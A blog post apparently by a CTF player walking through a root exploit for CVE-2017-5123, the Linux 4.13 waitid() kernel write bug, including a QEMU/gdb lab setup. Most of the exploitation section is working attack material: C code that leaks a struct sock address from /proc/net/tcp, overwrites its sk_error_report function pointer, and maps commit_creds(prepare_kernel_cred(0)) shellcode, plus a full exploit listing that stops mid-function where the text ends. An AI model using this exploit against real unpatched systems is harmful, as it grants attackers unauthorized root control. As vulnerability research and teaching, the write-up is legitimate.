CVE-2017-5123 exploitation

02/11/2017 in exploit | tags : kernel, exploit, CVE by Phenol

Intro

The 12 october 2017, a new vulnerability was discovered in the linux kernel 4.13 by Chris Salls. The vulnerability was introduced in the waitid syscall when it was refactored. It allows a userspace program to write anywhere in writable memory of the kernelspace and thus permits a privilege escalation exploit. When a friend told me about the vulnerability, I've seen that I was vulnerable, my kernel was a 4.13.6 on Archlinux, a lot of friend were also exposed. Some people from another CTF team in France released an exploit, but it was not useful for me because for doing the job, one needed to desactivate a very common protection (mmap_min_addr). Federico Bento also created an exploit which disables SELinux. To train my self and because it's fun, I decided to write my own exploit, my first real kernel exploit, so please take a seat, your favourite coffee mug and enjoy!

If you don't want to bother with my gibberish explanation, you can directly find the exploit code on my github.

Warning: bad english inside.

UPDATE 07/11/2017: Chris salls who discovered the vulnerability have made a really great article about it. He also show how to exploit it in order to bypass all protection like SMEP/SMAP and escape from Chrome sandbox. Read it! It's very cool and it's here.

I) The vulnerability

This vuln was labeled as CVE-2017-5123, the bug was introduced in 2017-05-21 and fixed the 2017-10-09. The vuln is present in 4.13.6 kernel and possibly in 4.14.0-rc4++. Like I said earlier, the bug is in the waitid syscall, we find the prototype declared in sys/wait.h:

int waitid(idtype_t idtype, id_t id, siginfo_t *infop, int options);

This syscall waits for a child process to state change, he takes as arguments an idtype_t which define if he should wait for juste one PID, a PGID or all childs of the current process. The second args is the PID or the PGID to wait for, the third arguments is the most interesting, it's the adresse of a structure siginfo_t. The last args define for which state change waitid should waits.

Let's take a look to the waitid syscall vulnerable implementation in the kernel, at file kernel/exit.c:

SYSCALL_DEFINE5(waitid, int, which, pid_t, upid, struct siginfo __user *,
        infop, int, options, struct rusage __user *, ru)
{
    struct rusage r;
    struct waitid_info info = {.status = 0};
    long err = kernel_waitid(which, upid, &info, options, ru ? &r : NULL);
    int signo = 0;

    if (err > 0) {
        signo = SIGCHLD;
        err = 0;
        if (ru && copy_to_user(ru, &r, sizeof(struct rusage)))
            return -EFAULT;
    }
    if (!infop)
        return err;
    user_access_begin();
    unsafe_put_user(signo, &infop->si_signo, Efault);
    unsafe_put_user(0, &infop->si_errno, Efault);
    unsafe_put_user((short)info.cause, &infop->si_code, Efault);
    unsafe_put_user(info.pid, &infop->si_pid, Efault);
    unsafe_put_user(info.uid, &infop->si_uid, Efault);
    unsafe_put_user(info.status, &infop->si_status, Efault);
    user_access_end();
    return err;
Efault:
    user_access_end();
    return -EFAULT;
}

The vulnerability come from the fact what they didn't check if the arguments are from userspace, so if we supply a kernel address for the third args (the siginfo_t pointer) the data which were normally written to a structure lying in userspace will be written in kernelspace, allowing us to write anywhere in writable memory of the kernel. Unfortunatly we can't write exactly what we wants.
By reading the above code we see that it will write: the signo (signal number), the si_errno (who always be equal to 0), si_code (signal code), the si_pid (pid of the child process), the si_uid (uid of the user owning the process) and the si_status aka the exit status.
In all these data the easiest to control is the exit status, by calling exit() we can specify an exit status from 0 to 0xff, so on the four bytes of the int we can just control the last significant one... We won't be able to write 8 fully controlled contigous bytes, even by consecutive write without erasing the previously written. Before getting further on how can we exploit this, let's create a debug environment.

II) Making a debug env

We will setup a debug env with QEMU and gdb, first we need to create a mini-linux constitued of our vulnerable kernel and a tiny initramfs. To quickly test our exploit we will also setup a 9PNET share in order to easily pass file from our host to the vulnerable VM.
First we create a working dir and download a 4.13.6 vanilla kernel from kernel.org:

[phenol@Lab cve]$ mkdir cve-2017-5123
[phenol@Lab cve]$ cd cve-2017-5123/
[phenol@Lab cve-2017-5123]$ wget https://cdn.kernel.org/pub/linux/kernel/v4.x/linux-4.13.6.tar.xz
--2017-11-02 20:13:42--  https://cdn.kernel.org/pub/linux/kernel/v4.x/linux-4.13.6.tar.xz
Loaded CA certificate '/etc/ssl/certs/ca-certificates.crt'
Resolving cdn.kernel.org... 151.101.61.176, 2a04:4e42:f::432
Connecting to cdn.kernel.org|151.101.61.176|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 100586296 (96M) [application/x-xz]
Saving to: ‘linux-4.13.6.tar.xz’

linux-4.13.6.tar.xz                     100%[=============================================================================>]  95.93M  1.41MB/s    in 71s     

2017-11-02 20:14:53 (1.36 MB/s) - ‘linux-4.13.6.tar.xz’ saved [100586296/100586296]

[phenol@Lab cve-2017-5123]$ tar xf linux-4.13.6.tar.xz 
[phenol@Lab cve-2017-5123]$ cd linux-4.13.6
[phenol@Lab linux-4.13.6]$ 

We need to configure and compile our kernel. We start by creating a default configuration and then we will improve it by adding debug symbol and all the module needed to setup the 9p share.

[phenol@Lab linux-4.13.6]$ make defconfig
  HOSTCC  scripts/basic/fixdep
  HOSTCC  scripts/kconfig/conf.o
  SHIPPED scripts/kconfig/zconf.tab.c
  SHIPPED scripts/kconfig/zconf.lex.c
  SHIPPED scripts/kconfig/zconf.hash.c
  HOSTCC  scripts/kconfig/zconf.tab.o
  HOSTLD  scripts/kconfig/conf
*** Default configuration is based on 'x86_64_defconfig'
#
# configuration written to .config
#
[phenol@Lab linux-4.13.6]$ make menuconfig

If everythings is correctly configured we should have in our .config file the following options set:

# for the 9pnet share we need 9p and virtio:

CONFIG_NET_9P=y
CONFIG_NET_9P_VIRTIO=m
CONFIG_NET_9P_DEBUG=y
CONFIG_9P_FS=y
CONFIG_9P_FS_POSIX_ACL=y
CONFIG_9P_FS_SECURITY=y
CONFIG_BLK_MQ_VIRTIO=y
CONFIG_NET_9P_VIRTIO=m
CONFIG_VIRTIO_NET=m
CONFIG_VIRTIO=m
CONFIG_VIRTIO_PCI=m
CONFIG_VIRTIO_PCI_LEGACY=y
CONFIG_VIRTIO_MMIO=m
CONFIG_CRYPTO_DEV_VIRTIO=m

# for debug:
CONFIG_DEBUG_INFO=y
# We can also add:
CONFIG_GDB_SCRIPTS=y #for using all gdb-script who come with the kernel

Now we can compile the kernel. All modules will be compiled and installed when the initramfs will be ready.

[phenol@Lab linux-4.13.6]$ make -j4 bzImage
    ...

After we can find our fresh kernel in arch/x86/boot/bzImage.
In order to creates an initramfs, we will be using busybox to set one quickly and easily. First we download busybox, extract it, make a default config and compile it staticaly to avoid lib dependance trouble:

[phenol@Lab linux-4.13.6]$ cd ..
[phenol@Lab cve-2017-5123]$ wget https://busybox.net/downloads/busybox-1.27.2.tar.bz2
--2017-11-02 20:45:39--  https://busybox.net/downloads/busybox-1.27.2.tar.bz2
Loaded CA certificate '/etc/ssl/certs/ca-certificates.crt'
Resolving busybox.net... 140.211.167.122
Connecting to busybox.net|140.211.167.122|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2216527 (2.1M) [application/x-bzip2]
Saving to: ‘busybox-1.27.2.tar.bz2’

busybox-1.27.2.tar.bz2                  100%[=============================================================================>]   2.11M   625KB/s    in 3.5s    

2017-11-02 20:45:44 (625 KB/s) - ‘busybox-1.27.2.tar.bz2’ saved [2216527/2216527]

[phenol@Lab cve-2017-5123]$ tar xf busybox-1.27.2.tar.bz2 
[phenol@Lab cve-2017-5123]$ cd busybox-1.27.2
[phenol@Lab busybox-1.27.2]$ make defconfig
    ....
[phenol@Lab busybox-1.27.2]$ make -j4 CFLAGS=-static install

Now we can find our initramfs root in the dir _install:

[phenol@Lab busybox-1.27.2]$ ls -l _install/
total 12
drwxr-xr-x 2 phenol phenol 4096 Nov  2 20:49 bin
lrwxrwxrwx 1 phenol phenol   11 Nov  2 20:49 linuxrc -> bin/busybox
drwxr-xr-x 2 phenol phenol 4096 Nov  2 20:49 sbin
drwxr-xr-x 4 phenol phenol 4096 Nov  2 20:49 usr

We will have to create some others directory like etc, home, root, dev, proc and sys then we move the initramfs in a dir at the root of our working dir.

[phenol@Lab busybox-1.27.2]$ cd _install/
[phenol@Lab _install]$ ls
bin  linuxrc  sbin  usr
[phenol@Lab _install]$ mkdir etc proc dev home root home/phenol
[phenol@Lab _install]$ cd ..
[phenol@Lab busybox-1.27.2]$ mv _install ../initramfs_root

Next we will create two user, one root and a lamdba user called phenol:

[phenol@Lab initramfs_root]$ vim etc/passwd
[phenol@Lab initramfs_root]$ cat etc/passwd 
root:x:0:0:root:/root:/bin/sh
phenol:x:1000:1000:user:/home/phenol:/bin/sh
[phenol@Lab initramfs_root]$ 

We also need an init script (in order to mount all required device, load all required modules and set a session). The init script is launched by the kernel when he is loaded.

[phenol@Lab initramfs_root]$ cat init 
#!/bin/sh


#Badass ascii-art 'coz we're fucking h4x0rz
echo "ICAgICAgICAgICAgICAgICAgICAgX18gICAgICAgICAgICAgICAgICAgICAgICAKX19fX19fX18gIF8gIF9fX19fXyB8ICB8IF9fIF9fX19fX19fX19fICBfX19fICAKXF9fX18gXCBcLyBcLyAvICAgIFx8ICB8LyAvLyBfXyBcXyAgX18gXC8gICAgXCAKfCAgfF8+ID4gICAgIC8gICB8ICBcICAgIDxcICBfX18vfCAgfCBcLyAgIHwgIFwKfCAgIF9fLyBcL1xfL3xfX198ICAvX198XyBcXF9fXyAgPl9ffCAgfF9fX3wgIC8KfF9ffCAgICAgICAgICAgICAgXC8gICAgIFwvICAgIFwvICAgICAgICAgICBcLyAKCSMJRGVidWcgQW5kIHAwd24JCSMKCQkgICAgUGhlbm9sCgoK" | base64 -d

mount -t devtmpfs none /dev
mount -t proc proc /proc
mount -t sysfs sysfs /sys

# The order of module loading is important. you can check the module.dep file (@thx francois!)
modprobe virtio
modprobe virtio_ring
modprobe virtio_pci
modprobe virtio_net
modprobe 9pnet_virtio

# share dir
mkdir -p /share
mount -t 9p -o trans=virtio shared /share

setsid cttyhack setuidgid 1000 sh

umount /proc
umount /sys

poweroff -f

We come back to our kernel dir, compile and install all the modules into the initramfs by specifying INSTALL_MOD_PATH:

[phenol@Lab initramfs_root]$ cd ../linux-4.13.6
[phenol@Lab linux-4.13.6]$ make modules && make modules_install INSTALL_MOD_PATH=/home/phenol/cve/cve-2017-5123/initramfs_root/
  CHK     include/config/kernel.release
  CHK     include/generated/uapi/linux/version.h
  CHK     include/generated/utsrelease.h
  CHK     include/generated/bounds.h
  CHK     include/generated/timeconst.h
  CHK     include/generated/asm-offsets.h
  CALL    scripts/checksyscalls.sh
  CHK     scripts/mod/devicetable-offsets.h
  CC [M]  fs/efivarfs/inode.o
  CC [M]  fs/efivarfs/file.o
  CC [M]  fs/efivarfs/super.o
  LD [M]  fs/efivarfs/efivarfs.o
  CC [M]  crypto/crypto_engine.o
  CC [M]  drivers/crypto/virtio/virtio_crypto_algs.o
  CC [M]  drivers/crypto/virtio/virtio_crypto_mgr.o
  CC [M]  drivers/crypto/virtio/virtio_crypto_core.o
    ....
[phenol@Lab linux-4.13.6]$ cd ../initramfs_root/ && ls lib/
modules
[phenol@Lab initramfs_root]$ ls
bin  dev  etc  home  init  lib  linuxrc  proc  root  sbin  usr
[phenol@Lab initramfs_root]$ ls lib/modules/4.13.6/
build  kernel  modules.builtin  modules.order  source
[phenol@Lab initramfs_root]$ ls lib/modules/4.13.6/build
COPYING  Documentation  Kconfig      Makefile        README  block  crypto   firmware  include  ipc lib  modules.builtin  net      scripts   sound  usr
CREDITS  Kbuild     MAINTAINERS  Module.symvers  arch    certs  drivers  fs        init kernel  mm   modules.order    samples  security  tools  virt
[phenol@Lab initramfs_root]$ 

Let's compress the initramfs and launch qemu.

[phenol@Lab initramfs_root]$ find . |cpio -H newc -o | gzip > ../initramfs.img
10592 blocks
[phenol@Lab initramfs_root]$ cd ..
[phenol@Lab cve-2017-5123]$ mv linux-4.13.6/arch/x86/boot/bzImage .

To launch qemu we will use the following script:

[phenol@Lab cve-2017-5123]$ cat startvm.sh 
#!/bin/bash

if [ -z "$1" ]
then
    SHAREHOST=/tmp
else
    SHAREHOST=$1
fi

qemu-system-x86_64 \
    -s\
    -m 512M \
    -nographic \
    -kernel bzImage \
    -enable-kvm\
    -append 'console=ttyS0 loglevel=3 oops=panic panic=1' \
    -monitor /dev/null \
    -initrd initramfs.img\
    -fsdev local,id=root,path=$SHAREHOST,security_model=none -device virtio-9p-pci,fsdev=root,mount_tag=shared

And ... TADAAAAAM:

[phenol@Lab cve-2017-5123]$ ./startvm.sh 
                     __                        
________  _  ______ |  | __ ___________  ____  
\____ \ \/ \/ /    \|  |/ // __ \_  __ \/    \ 
|  |_> >     /   |  \    <\  ___/|  | \/   |  \
|   __/ \/\_/|___|  /__|_ \\___  >__|  |___|  /
|__|              \/     \/    \/           \/ 
    #   Debug And p0wn      #
            Phenol


/ $ id
uid=1000(phenol) gid=1000 groups=1000 

Yeah, I know, that's a fucking ugly ascii art! Fun things begin here: because we have specified the -s flags to QEMU we may attach to the kernel with gdb:

[phenol@Lab linux-4.13.6]$ gdb vmlinux
GNU gdb (GDB) 8.0.1
Copyright (C) 2017 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-pc-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from vmlinux...done.
gdb-peda$ target remote :1234
Remote debugging using :1234
Warning: not running or target is remote
0xffffffffb0557d48 in ?? ()

III) The exploitation

Generally when we have an arbitrary write vuln, the exploit follow these steps:

  • Find a function pointer address

  • Overwrite this function pointer with shellcode address or ROP gagdet

  • trigger the function pointer

Like we said in the I) part, we didn't have a great control of the value who were written. We can't just overwrite a function pointer with another correctly formated address like a ROP gagdet one.
But we know the UID and the PID of our child process, and sizeof(uid_t)+ sizeof(pid_t) = 8 bytes aka the size of an address in x86_64. By using the uid and pid value we can create an address 'mapable' in userspace. E.g: If the uid of the user is 1000 (0x3e8) and the pid is 993 (0x3e1) we will be able to overwrite a function pointer with an address equivalent to 0x3e8000003e1, and we will also be able to map memory here in userspace. The plan is to finds a function pointer, creates a memory mapping at our 'fake-uid-pid-address' and then memcpy a shellcode which will elevates the privileges by calling commit_cred(prepare_kernel_cred(0)) when the function pointer will be triggered.

We need to find a function pointer and more important we need a function pointer in a memory writable zone. Lots of function pointer in the kernel are declared as const (or in const structure) so they are located in the .rodata segment which isn't writable. A lots of others function pointer like the LSM hook (Linux Security Module) are initialised at runtime and then the page where they are located are set read-only by calling ro_after_init :(

By playing with the /proc directory we can find some interesting addresses, like in /proc/net/tcp who list all TCP socket initialised on the system and if kptr_restrict protection isn't set (will explain later in part IV) we find the addresses of their struct sock into the kernelspace:

[phenol@Lab cve-2017-5123]$ cat /proc/net/tcp
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode                                                     
   0: 00000000:04D2 00000000:0000 0A 00000000:00000000 00:00000000 00000000  1000        0 15889787 1 ffff9f1102bc6800 99 0 0 10 0                   
   1: 4701A8C0:DCAC 21BD53D4:0539 01 00000000:00000000 02:00011862 00000000  1000        0 15177636 2 ffff9f11188e9000 23 3 30 10 -1                 
   2: 4701A8C0:E6DA 8E16D9AC:01BB 01 00000000:00000000 00:00000000 00000000  1000        0 15941196 1 ffff9f1118d2a000 25 3 27 10 -1                 
   3: 4701A8C0:C7F6 EAD03AD8:01BB 01 00000000:00000000 00:00000000 00000000  1000        0 15940232 1 ffff9f1036d88800 23 3 30 10 -1                 
   4: 4701A8C0:BF8A A2EC38B0:0016 01 00000000:00000000 02:0009182A 00000000  1000        0 4322245 2 ffff9f1036d8e800 29 3 30 4 4                    

The sock structure is declared as follow in the kernel source at include/net/sock.h:

struct sock {
    /*
     * Now struct inet_timewait_sock also uses sock_common, so please just
     * don't add nothing before this first member (__sk_common) --acme
     */
    struct sock_common  __sk_common;
#define sk_node         __sk_common.skc_node
#define sk_nulls_node       __sk_common.skc_nulls_node
#define sk_refcnt       __sk_common.skc_refcnt
#define sk_tx_queue_mapping __sk_common.skc_tx_queue_mapping

#define sk_dontcopy_begin   __sk_common.skc_dontcopy_begin
#define sk_dontcopy_end     __sk_common.skc_dontcopy_end
#define sk_hash         __sk_common.skc_hash
#define sk_portpair     __sk_common.skc_portpair
#define sk_num          __sk_common.skc_num
#define sk_dport        __sk_common.skc_dport
#define sk_addrpair     __sk_common.skc_addrpair
#define sk_daddr        __sk_common.skc_daddr
#define sk_rcv_saddr        __sk_common.skc_rcv_saddr
#define sk_family       __sk_common.skc_family
#define sk_state        __sk_common.skc_state
#define sk_reuse        __sk_common.skc_reuse
#define sk_reuseport        __sk_common.skc_reuseport
#define sk_ipv6only     __sk_common.skc_ipv6only
#define sk_net_refcnt       __sk_common.skc_net_refcnt
#define sk_bound_dev_if     __sk_common.skc_bound_dev_if
#define sk_bind_node        __sk_common.skc_bind_node
#define sk_prot         __sk_common.skc_prot
#define sk_net          __sk_common.skc_net
#define sk_v6_daddr     __sk_common.skc_v6_daddr
#define sk_v6_rcv_saddr __sk_common.skc_v6_rcv_saddr
#define sk_cookie       __sk_common.skc_cookie
#define sk_incoming_cpu     __sk_common.skc_incoming_cpu
#define sk_flags        __sk_common.skc_flags
#define sk_rxhash       __sk_common.skc_rxhash

    socket_lock_t       sk_lock;
    atomic_t        sk_drops;
    int         sk_rcvlowat;

    ...

/* STRIPPED LOT OF LINE TO IMPROVE READABILITY */
    ...

    u32         sk_max_ack_backlog;
#endif
    struct sock_cgroup_data sk_cgrp_data;
    struct mem_cgroup   *sk_memcg;
    void            (*sk_state_change)(struct sock *sk); // FUNCTION PTR
    void            (*sk_data_ready)(struct sock *sk); // FUNCTION PTR
    void            (*sk_write_space)(struct sock *sk); // FUNCTION PTR
    void            (*sk_error_report)(struct sock *sk); // FUNCTION PTR AGAIN!
    int         (*sk_backlog_rcv)(struct sock *sk,
                          struct sk_buff *skb); //YOLOOOOO
    void                    (*sk_destruct)(struct sock *sk); //COOL NO?

    struct sock_reuseport __rcu *sk_reuseport_cb;
    struct rcu_head     sk_rcu;
};

We can see that the sock structure owns 6 function pointer! And we're able to get their addresses by reading /proc/net/tcp and adding an offset. So now the plan is to initializes a listening TCP socket, leaks it's sock struct address in the kernel, and overwrite one of the sixth callback with our userspace-mapped address!

We init a listening socket on a hardcoded port, here 8888:

int create_listening_tcp(void)
{
        int socket_desc;
        struct sockaddr_in server;

        socket_desc = socket(AF_INET , SOCK_STREAM , 0);
        if (socket_desc == -1)
                exw(EXIT_FAILURE, "[!] Can't create socket\n");
        server.sin_family = AF_INET;
        server.sin_addr.s_addr = INADDR_ANY;
        server.sin_port = htons( 8888 );
        if( bind(socket_desc,(struct sockaddr *)&server , sizeof(server)) < 0)
                exw(EXIT_FAILURE, "[!] Can't bind socket\n");
        listen(socket_desc , 3);
    printf("[+] Listening TCP sock on port 8888\n");
    return (socket_desc);
}

Then by the socket file descriptor returned we find its inode by using the fstat syscall (in order to retrieve the corresponding sock struct address):

        sockfd = create_listening_tcp();
        fstat(sockfd, &statbuf);
        target_ptr = leak_sock_struct(statbuf.st_ino) + SOCKETSTRUCT_OFFSET;

with the leak_sock_struct declared as follow:

unsigned long   leak_sock_struct(int sock_inode)
{
        FILE            *f;
    unsigned long   addr;
    int     inode;
        char            s0[256];

        if ((f = fopen("/proc/net/tcp", "r")) == NULL)
                exw(EXIT_FAILURE, "[-] Failed to open /proc/net/tcp"); 
    fseek(f, 97, SEEK_SET);
    while (fscanf(f, "%s %s %s %s %s %s %s %s %s %d %s %p %s %s %s %s %s\n",
        s0, s0, s0, s0, s0, s0, s0, s0, s0, &inode, s0, (void**)&addr,
        s0, s0, s0, s0, s0) != EOF)
        {
        if (sock_inode == inode)
                {
                        fclose(f);
                        printf("[+] Found sock struct at %#lx\n", addr);
                        return (addr);
                }
        }
        fclose(f);
        printf("[!] Can't found socket by inode %d\n", sock_inode);
        return (0);

}

The function itself is very simple, it's open /proc/net/tcp, read line by line, and check if the inode read is equal to the inode of our instancied socket, if yes, then we return the readed address.

The macro SOCKETSTRUCT_OFFSET is the offset to reach the function pointer, we can determine it statically because we know the structure or we can choose the easy way and find it by debugging dynamically. We just have to look at the leaked sock addresse and within gdb look for our function pointer address.

In our VM we launch a simple program which will set a listenning tcp socket, and then we read the /proc/net/tcp file and retrieve the sock structure address:

/ $ /share/a.out &
/ $ [+] Listening TCP sock on port 8888

[1]+  Stopped (tty input)        /share/a.out
/ $ cat /proc/net/tcp
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode                                                     
   0: 00000000:22B8 00000000:0000 0A 00000000:00000000 00:00000000 00000000  1000        0 7129 1 ffff88001d0e0000 100 0 0 10 0                      
/ $ 

We launch gdb, attach to the kernel, and start examining the memory at the address 0x0xffff88001d0e0000 in manner to locate the function ptr callback:

[phenol@Lab linux-4.13.6]$ gdb vmlinux
GNU gdb (GDB) 8.0.1
Copyright (C) 2017 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-pc-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from vmlinux...done.
gdb-peda$ target remote :1234
Remote debugging using :1234
Warning: not running or target is remote
default_idle () at arch/x86/kernel/process.c:342
342     trace_cpu_idle_rcuidle(PWR_EVENT_EXIT, smp_processor_id());
gdb-peda$ x/100xg 0xffff88001d0e0000
0xffff88001d0e0000: 0x0000000000000000  0x22b8000000000000
0xffff88001d0e0010: 0x00000000400a0002  0x0000000000000000
0xffff88001d0e0020: 0xffff88001d11dfb8  0xffffffff81eeb1a0
0xffff88001d0e0030: 0xffffffff81ee4d00  0x0000000000000000
0xffff88001d0e0040: 0x0000000000000000  0x0000000000000000
0xffff88001d0e0050: 0x0000000000000000  0x0000000000000000
0xffff88001d0e0060: 0x0000000001000300  0x0000000000000000
0xffff88001d0e0070: 0xffffffff8212a448  0xffffffffffffffff
0xffff88001d0e0080: 0x0000000000000001  0x0000000000000000
0xffff88001d0e0090: 0x0000000000000000  0xffff88001d0e0098
0xffff88001d0e00a0: 0xffff88001d0e0098  0x0000000100000000
0xffff88001d0e00b0: 0xffff88001d0e00b0  0xffff88001d0e00b0
0xffff88001d0e00c0: 0x0000000000000000  0xffff88001d0e00c8
0xffff88001d0e00d0: 0xffff88001d0e00c8  0x0000000000000000
0xffff88001d0e00e0: 0x0000000000000000  0x0000000000000000
0xffff88001d0e00f0: 0x0000000000000000  0x0000000000000000
0xffff88001d0e0100: 0x0001555400000000  0x0000000000000000
0xffff88001d0e0110: 0xffff88001d11de40  0x0000000000000000
0xffff88001d0e0120: 0x0000000000000000  0x0000000000000000
0xffff88001d0e0130: 0x0000000000000000  0x0000400000000000
0xffff88001d0e0140: 0x0000000100000000  0x0000000000000000
0xffff88001d0e0150: 0x0000000000000000  0xffff88001d0e0158
0xffff88001d0e0160: 0xffff88001d0e0158  0x0000000000000000
0xffff88001d0e0170: 0x00000000ffffffff  0x0000000000000000
0xffff88001d0e0180: 0x7fffffffffffffff  0x0000000000000000
0xffff88001d0e0190: 0x0000000000000000  0x0000000000000000
0xffff88001d0e01a0: 0xffffffff817cf130  0xffff88001d0e0000
0xffff88001d0e01b0: 0x0000000000000000  0x0000000000000000
0xffff88001d0e01c0: 0xffffffffffffffff  0x0000000000000000
0xffff88001d0e01d0: 0x0000000000000000  0x0000000000000000
0xffff88001d0e01e0: 0x0000000000000000  0x0000000000000000
0xffff88001d0e01f0: 0x00000000014000c0  0x0000000000010680
0xffff88001d0e0200: 0x0000000000000000  0xffffffff81eeb1a0
0xffff88001d0e0210: 0x0000000000000000  0x0000000000000000
0xffff88001d0e0220: 0x0000000300000000  0x00000000000003e8
0xffff88001d0e0230: 0x0000000000000000  0x0000000000000000
0xffff88001d0e0240: 0x7fffffffffffffff  0xffffffffc4653600
0xffff88001d0e0250: 0x0000000000000000  0xffff88001dd1b180
0xffff88001d0e0260: 0x0000000000000000  0xffff88001ebcf740
0xffff88001d0e0270: 0x0000000000000000  0xffffffff81740600 //Our functions ptrs start here!
0xffff88001d0e0280: 0xffffffff81741520  0xffffffff8174da90
0xffff88001d0e0290: 0xffffffff81741420  0xffffffff817d2eb0
0xffff88001d0e02a0: 0xffffffff817ea170  0x0000000000000000
0xffff88001d0e02b0: 0x0000000000000000  0x0000000000000000
0xffff88001d0e02c0: 0x0000000000000000  0x0000ffff00000000
0xffff88001d0e02d0: 0x000000000000b822  0x0000000000000000
0xffff88001d0e02e0: 0x0101000000000000  0x0000000000000052
0xffff88001d0e02f0: 0x0000000000000000  0x0000000000000000
0xffff88001d0e0300: 0x0000000000000000  0x0000000000000000
0xffff88001d0e0310: 0x0000000000000000  0x0000000000000000
gdb-peda$ x/i 0xffffffff81740600
   0xffffffff81740600 <sock_def_wakeup>:    mov    rdi,QWORD PTR [rdi+0x110]
gdb-peda$ x/i 0xffffffff81741520
   0xffffffff81741520 <sock_def_readable>:  push   rbp
gdb-peda$ x/i 0xffffffff8174da90
   0xffffffff8174da90 <sk_stream_write_space>:  mov    eax,DWORD PTR [rdi+0x140]
gdb-peda$ x/i 0xffffffff81741420
   0xffffffff81741420 <sock_def_error_report>:  push   rbp
gdb-peda$ x/i 0xffffffff817d2eb0
   0xffffffff817d2eb0 <tcp_v4_do_rcv>:  push   rbp
gdb-peda$ x/i 0xffffffff817ea170
   0xffffffff817ea170 <inet_sock_destruct>: push   rbp

We will target the function ptr of this callback:
void (*sk_error_report)(struct sock *sk);
pointing to 0xffffffff81741420. So our offset is: 0xffff88001d0e0290 - 0xffff88001d0e0000 = 656, then we can define our macro like this:

#define SOCKETSTRUCT_OFFSET (sizeof(unsigned long) * 82) // 656 / 8.0 = 82

So now we know where we have to write, we just have to compute our userspace address, map memory here and copy the shellcode here. Let's build a shellcode with rasm2:

[phenol@Lab linux-4.13.6]$ rasm2 -a x86 -b64 "xor rdx, rdx; xor rdi, rdi; xor rsi, rsi; xor rcx, rcx; xor rax, rax; mov rbx, 0x4141414141414141; call rbx; mov rdi, rax;mov rcx, 0x4242424242424242; call rcx;ret"
4831d24831ff4831f64831c94831c048bb4141414141414141ffd34889c748b94242424242424242ffd1c3

The value 0x4141414141414141 and 0x4242424242424242 will be overwritten at runtime with prepare_kernel_cred and commit_cred address leaked from /proc/kallsyms. Look at the function build_shellcode who modify it and write it to our freshly mapped zone.

void    build_shellcode(unsigned long mem)
{
    char        shellcode[] = "\x48\x31\xd2\x48\x31\xff\x48\x31\xf6\x48\x31\xc9"
                      "\x48\x31\xc0\x48\xbb\x41\x41\x41\x41\x41\x41\x41"
                      "\x41\xff\xd3\x48\x89\xc7\x48\xb9\x42\x42\x42\x42"
                      "\x42\x42\x42\x42\xff\xd1\xc3";
    unsigned long   *sc0;
    unsigned long   *sc1;

    sc0 = (unsigned long*) &shellcode[17];
    sc1 = (unsigned long*) &shellcode[32];
    if ((*sc0 = get_kernel_sym("prepare_kernel_cred")) &&
        (*sc1 = get_kernel_sym("commit_creds")))
    {
        memcpy((void *)mem, shellcode, sizeof(shellcode));
        printf("[+] Shellcode modified and droped to %#lx\n", mem);
    }
    else
        exw(EXIT_FAILURE, "[!] Can't retrieve symbol!");
}

Now we have just to trig the overwritten function ptr which now point to the shellcode by calling shutdown() on the socket's fd.

The code of the exploit is very simple, I tried to make a clear and readable code:

[phenol@Lab cve]$ cat CVE-2017-5123.c 
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <signal.h>
#include <fcntl.h>
#include <sys/stat.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/wait.h>

#define SOCKETSTRUCT_OFFSET (sizeof(unsigned long) * 82)

void    exw(int code, char *s)
{
    printf("%s\n", s);
    exit(code);
}

unsigned long get_kernel_sym(char *name)
{
    FILE        *f;
    unsigned long   addr;
    char        dummy;
    char        sname[256];

    if ((f = fopen("/proc/kallsyms", "r")) == NULL)
        exw(EXIT_FAILURE, "[-] Failed to open /proc/kallsyms"); 
    while(fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname) != EOF)
    {
        if (!strcmp(name, sname))
        {
            fclose(f);
            printf("[+] Found %s at %#lx\n", name, addr);
            return addr;
        }
    }
    fclose(f);
    printf("[!] Can't found %s\n", name);
    return 0;
}

int create_listening_tcp(void)
{
        int socket_desc;
        struct sockaddr_in server;

        socket_desc = socket(AF_INET , SOCK_STREAM , 0);
        if (socket_desc == -1)
                exw(EXIT_FAILURE, "[!] Can't create socket\n");
        server.sin_family = AF_INET;
        server.sin_addr.s_addr = INADDR_ANY;
        server.sin_port = htons( 8888 );
        if( bind(socket_desc,(struct sockaddr *)&server , sizeof(server)) < 0)
                exw(EXIT_FAILURE, "[!] Can't bind socket\n");
        listen(socket_desc , 3);
    printf("[+] Listening TCP sock on port 8888\n");
    return (socket_desc);
}

unsigned long   leak_sock_struct(int sock_inode)
{
        FILE            *f;
    unsigned long   addr;
    int     inode;
        char            s0[256];

        if ((f = fopen("/proc/net/tcp", "r")) == NULL)
                exw(EXIT_FAILURE, "[-] Failed to open /proc/net/tcp"); 
    fseek(f, 97, SEEK_SET);
    while (fscanf(f, "%s %s %s %s %s %s %s %s %s %d %s %p %s %s %s %s %s\n",
        s0, s0, s0, s0, s0, s0, s0, s0, s0, &inode, s0, (void**)&addr,
        s0, s0, s0, s0, s0) != EOF)
        {
        if (sock_inode == inode)
                {
                        fclose(f);
                        printf("[+] Found sock struct at %#lx\n", addr);
